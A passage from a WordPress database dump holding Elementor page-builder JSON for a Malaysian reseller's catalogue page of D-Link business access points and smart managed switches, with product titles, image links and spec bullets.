for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7226,3361,'_elementor_version','2.5.14'),(7227,3361,'_elementor_edit_mode','builder'),(7230,3362,'_wp_page_template','template-fullwidth.php'),(7231,3362,'_elementor_template_type','post'),(7232,3362,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G 